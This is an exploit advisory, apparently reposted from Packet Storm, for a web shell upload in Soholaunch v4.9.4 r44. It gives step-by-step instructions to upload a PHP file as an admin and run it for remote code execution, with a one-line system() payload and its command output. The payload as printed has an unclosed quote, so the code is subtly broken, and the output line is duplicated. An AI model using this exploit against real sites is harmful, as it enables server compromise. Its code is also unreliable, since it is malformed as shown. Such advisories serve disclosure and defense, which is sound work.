Soholaunch 4.9.4 r44 Shell Upload
2024-3-30 01:57:10 Author: packetstormsecurity.com(查看原文) 阅读量:12 收藏

## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution
### Date: 2024-3-29
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://livesite.com/
### Version : v4.9.4 r44

1 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file

Payload : <?php echo system('id); ?>

2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.php

Result: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)


文章来源: https://packetstormsecurity.com/files/177852/soholaunch494r44-shell.txt
如有侵权请联系:admin#unsafe.sh